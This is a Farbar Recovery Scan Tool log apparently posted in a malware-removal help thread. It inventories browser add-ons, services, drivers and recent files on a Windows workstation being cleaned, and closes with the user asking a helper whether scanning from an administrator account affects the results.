http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 - {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS SearchScopes: HKCU - DefaultScope {8335BEAF-47A5-4161-B0E5-834D95BB52B3} URL = BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation) BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation) BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation) BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO-x32: WebEx Productivity Tools -> {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} -> C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC) BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated) Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll (Adobe Systems Incorporated) Toolbar: HKLM-x32 - WebEx Productivity Tools - {90E2BA2E-DD1B-4cde-9134-7A8B86D33CA7} - C:\Program Files (x86)\WebEx\Productivity Tools\ptonecli.dll (Cisco WebEx LLC) Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation) Winsock: Catalog5 10 C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [24320] (National Instruments Corporation) Winsock: Catalog5-x64 10 C:\Program Files\National Instruments\Shared\mDNS Responder\nimdnsNSP.dll [26368] (National Instruments Corporation) Tcpip\Parameters: [DhcpNameServer] 192.168.1.5 192.168.1.6 FireFox: ======== FF ProfilePath: C:\Users\bcostello\AppData\Roaming\Mozilla\Firefox\Profiles\fxbxrcay.default FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll () FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll (Adobe Systems Inc.) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2011win32.dll (National Instruments) FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nplv2012win32.dll (National Instruments) FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn FF Extension: Adobe Acrobat - Create PDF - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-02-20] FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird FF Extension: ESET Smart Security Extension - C:\Program Files\ESET\ESET NOD32 Antivirus\Mozilla Thunderbird [2013-03-15] Chrome: ======= ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-02] (Microsoft Corporation) R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2436280 2014-09-25] (Microsoft Corporation) R2 CrmSqlStartupSvc; C:\Program Files (x86)\Microsoft Dynamics CRM\Client\bin\CrmSqlStartupSvc.exe [23400 2012-01-16] (Microsoft Corporation) R2 DcomLaunch; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed] S3 EhttpSrv; C:\Program Files\ESET\ESET NOD32 Antivirus\EHttpSrv.exe [42360 2010-08-12] (ESET) R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [810144 2010-08-12] (ESET) R2 EmbassyService; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\EMBASSY Client Core\EmbassyServer.exe [225720 2012-11-20] () R2 L4301_Solar; C:\Program Files\Logitech\SolarApp\L4301_Solar.exe [405744 2013-01-30] (Logitech, Inc.) R2 LkCitadelServer; C:\Windows\SysWOW64\lkcitdl.exe [695136 2010-10-27] (National Instruments, Inc.) R2 lkClassAds; C:\Windows\SysWOW64\lkads.exe [50328 2012-11-28] (National Instruments Corporation) R2 lkTimeSync; C:\Windows\SysWOW64\lktsrv.exe [60568 2012-11-28] (National Instruments Corporation) R2 msoidsvc; C:\Program Files\Common Files\Microsoft Shared\Microsoft Online Services\MSOIDSVC.EXE [2060192 2011-04-28] (Microsoft Corp.) R2 mxssvr; C:\Program Files (x86)\National Instruments\MAX\nimxs.exe [51360 2012-11-21] (National Instruments Corporation) S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [272688 2012-08-23] () R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-01-18] (Hewlett-Packard) [File not signed] R2 NIApplicationWebServer; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [54472 2012-11-30] (National Instruments Corporation) S4 NIApplicationWebServer64; C:\Program Files\National Instruments\Shared\NI WebServer\ApplicationWebServer.exe [76488 2012-11-30] (National Instruments Corporation) R2 NIDomainService; C:\Program Files (x86)\National Instruments\Shared\Security\nidmsrv.exe [371352 2012-11-28] (National Instruments Corporation) S3 NILM License Manager; C:\Program Files (x86)\National Instruments\Shared\License Manager\Bin\lmgrd.exe [1427688 2010-08-02] (Macrovision Corporation) R2 nimDNSResponder; C:\Program Files (x86)\National Instruments\Shared\mDNS Responder\nimdnsResponder.exe [258776 2012-09-26] (National Instruments Corporation) R2 NINetworkDiscovery; C:\Program Files (x86)\National Instruments\Shared\NI Network Discovery\niDiscSvc.exe [172344 2012-12-18] (National Instruments Corporation) R2 niSvcLoc; C:\Program Files (x86)\National Instruments\Shared\NI WebServer\SystemWebServer.exe [54464 2012-11-30] (National Instruments Corporation) R2 NITaggerService; C:\Program Files (x86)\National Instruments\Shared\Tagger\tagsrv.exe [680624 2012-06-07] (National Instruments Corporation) R2 O2FLASH; C:\Windows\system32\o2flash.exe [244328 2011-11-16] (O2Micro International) R2 PbaDrvSvc_x64; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\hapi64\pbadrvsvc.exe [20480 2012-11-23] () [File not signed] R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-01-18] (Hewlett-Packard) [File not signed] R2 RpcSs; C:\Windows\system32\rpcss.dll [524288 2014-06-03] (Microsoft Corporation) [File not signed] S2 tcsd_win32.exe; C:\Program Files (x86)\Security Innovation\SI TSS\bin\tcsd_win32.exe [1643520 2012-05-11] () [File not signed] R2 Wave Authentication Manager Service; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Authentication Manager\WaveAMService.exe [1758720 2012-11-19] (Wave Systems Corp.) [File not signed] S2 WvPCR; C:\Program Files\Dell\Dell Data Protection\Access\Advanced\Wave\Common\WvPCR.exe [254384 2012-11-08] (Wave Systems Corp.) R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3342640 2012-08-23] (Intel® Corporation) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R3 dcdbas; C:\Windows\System32\DRIVERS\dcdbas64.sys [39016 2012-09-23] (Dell Inc.) R2 DgiVecp; C:\Windows\system32\Drivers\DgiVecp.sys [53816 2010-01-21] (Samsung Electronics Co., Ltd.) R2 eamonm; C:\Windows\System32\DRIVERS\eamonm.sys [168544 2010-07-29] (ESET) R1 ehdrv; C:\Windows\System32\DRIVERS\ehdrv.sys [141264 2010-07-29] (ESET) R2 epfwwfpr; C:\Windows\System32\DRIVERS\epfwwfpr.sys [126320 2010-07-29] (ESET) R1 nvkflt; C:\Windows\System32\DRIVERS\nvkflt.sys [300320 2013-12-04] (NVIDIA Corporation) R3 ST_ACCEL; C:\Windows\System32\DRIVERS\ST_ACCEL.sys [68208 2012-05-21] (STMicroelectronics) R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [47072 2012-10-09] (Windows ® Win 7 DDK provider) S3 wbfcvusbdrv; C:\Windows\System32\Drivers\wbfcvusbdrv.sys [16008 2012-10-24] () R3 XHCIPort; C:\Windows\System32\DRIVERS\XHCIPort.sys [188896 2012-10-09] (Windows ® Win 7 DDK provider) S3 KAPFA; \??\C:\Windows\system32\drivers\KAPFA.SYS [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-04 10:01 - 2014-11-04 10:01 - 00024053 _____ () C:\Users\rbecker\Desktop\FRST.txt 2014-11-04 09:54 - 2014-11-04 09:59 - 02114560 _____ (Farbar) C:\Users\rbecker\Desktop\FRST64.exe 2014-11-04 09:29 - 2014-11-04 09:29 - 00004035 _____ () C:\Users\bcostello\Desktop\RKreport_SCN_11042014_092846.log 2014-11-04 09:23 - 2014-11-04 09:25 - 00037624 _____ () C:\Windows\system32\Drivers\TrueSight.sys 2014-11-04 09:23 - 2014-11-04 09:23 - 17526360 _____ () C:\Users\bcostello\Desktop\RogueKillerX64.exe 2014-11-04 09:23 - 2014-11-04 09:23 - 00000000 ____D () C:\ProgramData\RogueKiller 2014-11-04 09:20 - 2014-11-04 09:20 - 00001471 _____ () C:\Users\bcostello\Desktop\mbamreport.txt 2014-11-04 09:10 - 2014-11-04 09:10 - 00001104 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk 2014-11-04 09:09 - 2014-11-04 09:09 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\bcostello\Downloads\mbam-setup-2.0.3.1025.exe 2014-11-03 16:44 - 2014-11-03 16:44 - 00046148 _____ () C:\Users\bcostello\Desktop\Addition.txt 2014-11-03 16:44 - 2014-11-03 16:44 - 00036389 _____ () C:\Users\bcostello\Desktop\FRST.txt 2014-11-03 16:42 - 2014-11-03 16:42 - 02114560 _____ (Farbar) C:\Users\bcostello\Downloads\FRST64(1).exe 2014-11-03 16:41 - 2014-11-03 16:41 - 02114560 _____ (Farbar) C:\Users\bcostello\Desktop\FRST64.exe 2014-11-03 16:41 - 2014-11-03 16:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Macromedia 2014-11-03 15:54 - 2014-11-03 15:54 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu(1).exe 2014-11-03 15:35 - 2014-11-03 15:35 - 02347384 _____ (ESET) C:\Users\bcostello\Downloads\esetsmartinstaller_enu.exe 2014-11-03 15:35 - 2014-11-03 15:35 - 00000000 ____D () C:\Program Files (x86)\ESET 2014-11-03 15:13 - 2014-11-04 09:09 - 00003056 _____ () C:\Windows\System32\Tasks\Defrag 2014-11-03 15:13 - 2014-11-04 09:09 - 00000232 _____ () C:\Windows\Tasks\Defrag.job 2014-11-03 14:49 - 2014-11-03 14:49 - 00030010 _____ () C:\ComboFix.txt 2014-11-03 14:41 - 2014-11-03 14:50 - 00000000 ____D () C:\ComboFix 2014-11-03 14:41 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe 2014-11-03 14:41 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe 2014-11-03 14:41 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2014-11-03 14:41 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2014-11-03 14:41 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2014-11-03 14:41 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe 2014-11-03 14:41 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe 2014-11-03 14:41 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe 2014-11-03 14:40 - 2014-11-03 14:50 - 00000000 ____D () C:\Qoobox 2014-11-03 14:40 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\erdnt 2014-11-03 14:25 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Macromedia 2014-11-03 14:12 - 2014-11-03 14:12 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\WinRAR 2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\SysWOW64\NV 2014-11-03 14:00 - 2014-11-03 14:48 - 00000000 ____D () C:\Windows\system32\NV 2014-10-31 12:22 - 2014-11-04 09:45 - 00129752 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2014-10-31 12:22 - 2014-11-04 09:10 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware 2014-10-31 12:22 - 2014-10-31 12:22 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-10-31 12:22 - 2014-10-01 11:11 - 00093400 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-10-31 12:22 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-10-31 12:22 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-10-31 12:21 - 2014-10-31 12:21 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\rbecker\Downloads\mbam-setup-2.0.3.1025.exe 2014-10-31 09:13 - 2014-10-31 09:13 - 00001161 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk 2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\ProgramData\Mozilla 2014-10-31 09:13 - 2014-10-31 09:13 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service 2014-10-31 09:12 - 2014-10-31 09:12 - 00244032 _____ () C:\Users\rbecker\Downloads\Firefox Setup Stub 33.0.2.exe 2014-10-31 09:09 - 2014-10-31 09:13 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Mozilla 2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Mozilla 2014-10-31 09:09 - 2014-10-31 09:09 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Macromedia 2014-10-22 07:49 - 2014-10-22 07:49 - 00002345 _____ () C:\Users\rbecker\Desktop\OneNote 2013.lnk 2014-10-22 07:48 - 2014-10-22 07:48 - 00002403 _____ () C:\Users\rbecker\Desktop\Word 2013.lnk 2014-10-22 07:48 - 2014-10-22 07:48 - 00002402 _____ () C:\Users\rbecker\Desktop\PowerPoint 2013.lnk 2014-10-22 07:48 - 2014-10-22 07:48 - 00002366 _____ () C:\Users\rbecker\Desktop\Access 2013.lnk 2014-10-22 07:46 - 2014-10-22 07:46 - 00002365 _____ () C:\Users\rbecker\Desktop\Excel 2013.lnk 2014-10-22 07:46 - 2014-10-22 07:46 - 00002359 _____ () C:\Users\rbecker\Desktop\Outlook 2013.lnk 2014-10-22 07:36 - 2014-10-22 07:36 - 00000000 ____D () C:\Users\rbecker\AppData\Local\VirtualStore 2014-10-21 13:26 - 2014-10-21 13:26 - 00000000 ____D () C:\Users\rbecker\Documents\OneNote Notebooks 2014-10-21 11:43 - 2014-10-21 11:43 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Macromedia 2014-10-21 11:11 - 2014-10-21 11:11 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Apple 2014-10-21 11:09 - 2014-10-21 11:09 - 00000000 ___RD () C:\MSOCache 2014-10-21 11:03 - 2014-10-21 11:03 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Apple Computer 2014-10-21 11:00 - 2014-10-21 12:35 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Adobe 2014-10-21 11:00 - 2014-10-21 12:34 - 00000000 ____D () C:\Users\rbecker\AppData\Local\Adobe 2014-10-21 11:00 - 2014-10-21 11:00 - 00112248 _____ () C:\Users\rbecker\AppData\Local\GDIPFONTCACHEV1.DAT 2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Creative 2014-10-21 11:00 - 2014-10-21 11:00 - 00000000 ____D () C:\Users\rbecker\AppData\Local\National Instruments 2014-10-21 10:59 - 2014-10-21 10:59 - 00001411 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk 2014-10-21 10:58 - 2014-11-04 09:01 - 00003856 __RSH () C:\Users\rbecker\ntuser.pol 2014-10-21 10:58 - 2014-11-04 09:01 - 00000000 ____D () C:\Users\rbecker 2014-10-21 10:58 - 2014-10-21 10:59 - 00001445 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-10-21 10:58 - 2014-10-21 10:58 - 00000020 ___SH () C:\Users\rbecker\ntuser.ini 2014-10-21 10:58 - 2014-10-21 10:58 - 00000000 ____D () C:\Users\rbecker\AppData\Roaming\Intel 2014-10-21 10:58 - 2013-03-14 10:42 - 00002102 _____ () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft SkyDrive.lnk 2014-10-21 10:58 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories 2014-10-21 10:58 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\rbecker\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance 2014-10-21 10:49 - 2014-11-03 15:35 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Mozilla 2014-10-21 10:49 - 2014-10-21 10:49 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Mozilla 2014-10-20 13:53 - 2014-10-20 13:53 - 00012872 _____ (SurfRight B.V.) C:\Windows\SysWOW64\bootdelete.exe 2014-10-20 13:53 - 2014-10-20 13:53 - 00000190 _____ () C:\Windows\SysWOW64\bootdelete.lst 2014-10-20 13:52 - 2014-10-31 09:06 - 00030616 _____ () C:\Windows\SysWOW64\Drivers\hitmanpro37.sys 2014-10-20 13:49 - 2014-10-20 13:49 - 00000000 ____D () C:\Program Files\HitmanPro 2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR 2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR 2014-10-20 13:46 - 2014-10-20 13:46 - 00000000 ____D () C:\Program Files\WinRAR 2014-10-20 13:33 - 2014-10-20 13:53 - 00000000 ____D () C:\ProgramData\HitmanPro 2014-10-17 15:11 - 2014-11-04 10:01 - 00000000 ____D () C:\FRST 2014-10-17 11:41 - 2014-11-03 14:25 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Adobe 2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Creative 2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\National Instruments 2014-10-17 11:41 - 2014-10-17 11:41 - 00000000 ____D () C:\Users\bcostello\AppData\Local\Adobe 2014-10-17 11:40 - 2014-10-17 11:40 - 00001411 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk 2014-10-17 11:39 - 2014-10-17 11:40 - 00001445 _____ () C:\Users\bcostello\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2014-10-17 11:39 - 2014-10-17 11:39 - 00002558 __RSH () C:\Users\bcostello\ntuser.pol 2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Roaming\Intel 2014-10-17 11:39 - 2014-10-17 11:39 - 00000000 ____D () C:\Users\bcostello\AppData\Local\VirtualStore 2014-10-17 10:38 - 2014-10-17 10:38 - 00000000 ____D () C:\Users\bcostello\Documents\Audible 2014-10-17 10:36 - 2014-10-17 10:36 - 00000000 ____D () C:\Windows\pss ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-04 10:00 - 2014-10-01 10:43 - 00005014 _____ () C:\Windows\System32\Tasks\WSCEAA 2014-11-04 09:43 - 2013-03-14 10:17 - 00000112 _____ () C:\Windows\system32\config\netlogon.ftl 2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-11-04 09:15 - 2009-07-13 23:45 - 00021312 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-11-04 09:12 - 2013-02-20 15:12 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-11-04 09:12 - 2009-07-14 00:13 - 00785022 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-04 09:09 - 2013-03-14 10:18 - 00017315 __RSH () C:\ProgramData\ntuser.pol 2014-11-04 09:08 - 2014-01-09 08:58 - 00041891 _____ () C:\Windows\setupact.log 2014-11-04 09:08 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-11-04 09:07 - 2013-02-20 15:12 - 01748052 _____ () C:\Windows\WindowsUpdate.log 2014-11-04 09:02 - 2013-09-10 09:03 - 00004978 _____ () C:\Windows\System32\Tasks\Microsoft Office 15 Sync Maintenance for {3cb986d6-91c6-4e57-9f69-11185dadd832} ADC69.adc.com 2014-11-03 17:33 - 2013-09-12 09:26 - 00000072 _____ () C:\Users\Public\LMDebug.log 2014-11-03 15:10 - 2014-01-10 08:55 - 00449262 _____ () C:\Windows\PFRO.log 2014-11-03 14:50 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Default 2014-11-03 14:48 - 2009-07-13 21:34 - 00000215 _____ () C:\Windows\system.ini 2014-11-03 14:47 - 2009-07-13 21:34 - 92012544 _____ () C:\Windows\system32\config\SOFTWARE.bak 2014-11-03 14:47 - 2009-07-13 21:34 - 19136512 _____ () C:\Windows\system32\config\SYSTEM.bak 2014-11-03 14:47 - 2009-07-13 21:34 - 01048576 _____ () C:\Windows\system32\config\DEFAULT.bak 2014-11-03 14:47 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SECURITY.bak 2014-11-03 13:51 - 2009-07-13 21:34 - 00262144 _____ () C:\Windows\system32\config\SAM.bak 2014-11-02 07:41 - 2013-10-23 16:10 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox 2014-10-31 09:13 - 2013-10-23 16:10 - 00001149 _____ () C:\Users\Public\Desktop\Mozilla Firefox.lnk 2014-10-23 14:33 - 2009-07-13 22:20 - 00000000 __RHD () C:\Users\Public\Libraries 2014-10-22 07:36 - 2009-07-14 00:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD 2014-10-21 09:38 - 2013-03-14 10:40 - 00000000 ____D () C:\Program Files\Microsoft Office 15 2014-10-21 09:11 - 2009-07-13 22:20 - 00000000 ____D () C:\Windows\system32\NDF 2014-10-17 11:39 - 2014-08-14 08:05 - 00000000 ____D () C:\Users\bcostello 2014-10-15 10:35 - 2014-09-09 19:05 - 00000000 ____D () C:\FTC 2014-10-15 09:56 - 2013-04-09 14:09 - 00000020 ____H () C:\ProgramData\PKP_DLet.DAT 2014-10-06 07:57 - 2009-07-14 00:08 - 00032612 _____ () C:\Windows\Tasks\SCHEDLGU.TXT Files to move or delete: ==================== C:\Users\kmitchell\CrmClientSetup.exe C:\Users\kmitchell\msvcp100.dll C:\Users\kmitchell\msvcr100.dll Some content of TEMP: ==================== C:\Users\bcostello\AppData\Local\Temp\dllnt_dump.dll ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll [2010-11-20 22:24] - [2014-06-03 08:23] - 0524288 ____A (Microsoft Corporation) 6223F47AFA5D9C1ECB5AFD088BD19618 ATTENTION ======> If the system is having audio adware rpcss.dll is patched. Google the MD5, if the MD5 is unique the file is infected. C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-10-29 11:59
  9. Thanks for your time and help with this MrCharlie. I also want to mention that I'm running these scans on my administrator account, not the account of the affected user. Will this affect the results?
